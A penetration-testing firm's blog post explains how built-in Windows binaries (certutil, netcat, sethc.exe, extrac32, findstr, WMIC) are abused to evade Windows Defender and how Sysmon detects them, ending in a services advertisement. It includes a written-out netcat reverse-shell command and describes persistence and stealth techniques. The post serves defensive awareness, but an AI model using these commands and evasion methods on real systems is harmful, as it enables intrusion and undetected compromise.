• Mattia Campagnano

Weaponizing Windows Binaries and Scripts (LOLBAS): What's Old Is New Again


Image source: https://www.hacking.reviews/2019/02/lolbas-living-off-land-binaries-and.html

Over the last few years, attackers have leveraged increasingly sophisticated techniques to exploit coding bugs in web applications, and security gaps both in endpoint detection and response (EDR) systems, endpoint protection platforms (EPPs), and antivirus software.

Security solutions play a cat-and-mouse game with the bad guys, often trying to catch up, and often failing to do so. Most security products focus on detecting malicious payloads dropped on the target machine in multiple ways (through phishing, drive-by downloads, and other mechanisms), but often fail to detect and respond to other attack vectors.

One of the latest trends in penetration testing and malware development is to weaponize the so-called Living Off the Land Binaries and Scripts (LOLBAS), i.e. scripts and binaries normally installed by default in Microsoft Windows. Attackers and pen testers have long relied on LOLBAS techniques, but there seems to be a resurgence of interest. Some built-in Windows binaries may support functionalities potentially allowing for compromise of the target system, but as they are often bundled in Windows and signed by Microsoft, they do not normally raise any eyebrows when present in system activity. If skilled attackers manage to use signed Windows binaries to break in, they could more easily bypass endpoint detection and response systems and go undetected.

Utilizing LOLBAS, attackers don't need to download or install a third-party executable that could be flagged and blocked, generating a revealing audit trail, so they can be extremely stealthy and hard to defend against.

This post will demonstrate some hands-on examples of LOLBAS exploitation that the Polito team successfully used in recent engagements, and will analyze how Windows Defender and Sysmon fare in detecting these types of attacks. The Polito team conducted these tests on a Windows 10 Pro virtual machine with Windows Defender real-time protection and Windows Update enabled.

LOLBAS Project

This is the concept behind the LOLBAS project, available at:

https://lolbas-project.github.io/

The LOLBAS Project was developed in an attempt to analyze and list the most important binaries susceptible to being abused for compromising Windows systems.

GTFOBins

A similar project has also been created for UNIX/Linux systems:

https://github.com/GTFOBins

The TTPs (Tactics, Techniques & Procedures) based on the use of LOLBAS (Living Off the Land Binaries and Scripts) can also be considered as being part of the MITRE ATT&CK framework, available at https://attack.mitre.org/

MITRE ATT&CK

MITRE ATT&CK is "a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community".

ATT&CK is a useful reference, allowing a closer analysis of security gaps in organizations that can lead to system compromise and a better understanding of the shortcomings of alternative security solutions. In fact, most endpoint defense platforms focus on signatures or behavioral patterns, so they detect a potentially malicious binary either when it is not signed by Microsoft or other trusted sources, or when its hash value matches the hash value of a known malware variant.

HANDS-ON EXAMPLES

1. Certutil:

Certutil is a standard Windows utility having dual purposes. Its primary function is to dump, display, and configure certification authority (CA) information.

However, it can also be used to upload a file to a Windows computer, without checking the format of the file.

Polito testing team successful used certutil to transfer a malicious file generated with msfvenom, but Windows Defender detected the file as a generic Trojan and removed it. In other words, the delivery technique was stealthy and went unimpeded, but for the delivered payload itself, not so much.

2. nc.exe (netcat for Windows):

Netcat for Windows (nc.exe) is a signed binary often available by default in Windows. Even when not included in Windows, nc.exe is readily available online for download. Netcat allows to easily create a reverse shell through its -e option (not always supported), but being a signed executable, it doesn't trigger any Defender alerts.

The Polito team used netcat to obtain a reverse shell on a Windows 10 Pro machine, going completely undetected (command run: nc.exe 192.168.1.89 5555 -e cmd.exe).

3. sethc.exe (Sticky Keys):

Sticky Keys is an accessibility feature that can be activated by pressing the SHIFT key 5 times. If attackers can access the local file system with the right set of privileges, they could replace the executable handling the sticky keys feature (sethc.exe) with cmd.exe and spawn a terminal, when the functionality is recalled.

This approach can be used to run a wide series of attacks that may include adding a new user, thereby achieving persistence on the target machine.

4. extrac32.exe:

The binary extrac32.exe is used to extract cab archives, but can also be used to add alternate data streams to a file. In the below example, testers added a hidden executable (Process Explorer) to a file called file.txt, and the file didn’t change its displayed size. Then they created a process to run the executable, without triggering any Defender alerts. The executable was then launched by using wmic process call create. The Windows Management Instrumentation Command Line (WMIC) can be used to automate Windows processes and allows also to launch them from command line.

5. Findstr.exe:

findstr finds strings within text files, but the command can be abused to search for a non-existing string in a file, and pipe it into a new file.

No Defender alerts were triggered whatsoever, even after launching the executable through Windows Management Instrumentation Command Line (WMIC)

Along the same lines, attackers can create a fake service following alike steps as above and then run said service through Windows Management Instrumentation Command Line (WMIC), without getting detected.

DETECTION RESPONSES

As for examples 1 through 5, the Polito test team didn't trigger any alerts in Windows Defender.

However, after deploying Sysmon on the target machine, the above attacks created specific, detectable event logs on the target system.

Sysmon is a free Microsoft endpoint tool available for Windows, part of the Sysinternals tools, that "provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network". Sysmon logs provide additional insights that are often invaluable for an Incident Response (IR) or a Threat Hunting team.

In order to understand how Sysmon can improve incident response and threat hunting capabilities in a Windows system, we'll analyze some example of event IDs it generated on the target machine.

Sysmon logs are found in Event Viewer (eventvwr.exe) under Applications and Services Logs/Microsoft/Windows/Sysmon/Operational.

Below is the Sysmon log generated when creating a new process, with reference to attack 5.

Also, while Windows Defender didn’t detect the network connection created with nc.exe, with reference to example attack 2, Sysmon logged the whole process, along with another event related to the whoami command, run remotely. Without Sysmon deployed on the system and logging full command lines, default Windows logs in many cases would not show anything suspicious related to these specific events.

Wrap-up

It's been recently stated that antivirus and intrusion detection/prevention systems (IDS/IPS) have made the ultimate comeback and launching vanilla Mimikatz and Meterpreter payloads won't cut it anymore, even by using encryption.

LOLBAS (Living Off the Land Binaries and Scripts)⁣ and GTFOBins (for Linux) are incredibly useful resources for identifying and abusing tools installed on almost every machine for multiple stages of the attack kill chain, such as jail shell escaping, privilege escalation, covert file transfers, and data exfiltration. ⁣This attack vector isn't a guarantee of success per se, though, because much depends on the detection and logging capabilities of the target system. The skill set and experience level of the IR or Threat Hunting team can make a big difference with the outcome.

Getting a shell on a target system has become increasingly difficult for red teamers/pen testers. EDR and AV solutions have greatly stepped up their game and detect many common payloads. As many attackers and pen testers kept using the same payloads for years in offensive security, EDR solutions have improved over time and started incorporating most well-known signatures from VirusTotal and other sources. Therefore, a payload created with tools such as msfvenom is becoming increasingly detectable. AI and higher response capabilities have made this approach more scalable and easier to update and implement, regardless of obfuscation, encoding, or other anti-forensic techniques are used.

An increasingly common solution to this challenge is to create custom payloads and/or utilize LOLBAS. Most of the binaries and scripts included within the LOLBAS typology have underlying functionalities that can be abused to compromise a target system, but many are signed or at least published by Microsoft, so detection and protection capabilities and defenders often overlook them.

Polito team firmly believes this is the future of penetration testing and we’ll continue to see LOLBAS increasingly being used by bad guys to evade endpoint defenses.

Is your organization ready for this new scenario?

The Polito team is here to help you meet this challenge. Our team members have extensive professional experience in handling LOLBAS-related attack vectors, and can help you every step of the way, whether you need Penetration Testing, Incident Response, or Threat Hunting services. Our penetration testers are certified professionals who go the extra mile to provide a real service to our customers. We strive for excellence and take great pride in the work we do for our customers.

Polito, Inc. offers a wide range of security consulting services including threat hunting, penetration testing, vulnerability assessments, incident response, digital forensics, and more. If your business or your clients have any cyber security needs, contact our experts and experience what Masterful Cyber Security is all about.

Phone: 571-969-7039

E-mail: info@politoinc.com

Website: politoinc.com

References: https://www.varonis.com/blog/the-malware-hiding-in-your-windows-system32-folder-more-alternate-data-streams-and-rundll32/ https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

https://docs.microsoft.com/en-us/archive/blogs/askcore/alternate-data-streams-in-ntfs

https://attack.mitre.org/techniques/T1015/

https://attack.mitre.org/techniques/T1034/

https://attack.mitre.org/techniques/T1105/

https://ired.team/offensive-security/persistence/t1084-abusing-windows-managent-instrumentation

Contact Us
Our Address

5015 Observer Ln

Woodbridge, VA 22192

info@politoinc.com

Call Us
  • White LinkedIn Icon
  • White Facebook Icon
  • White Twitter Icon
  • White Google+ Icon

© 2020 by Polito, Inc. All rights reserved. Privacy Policy.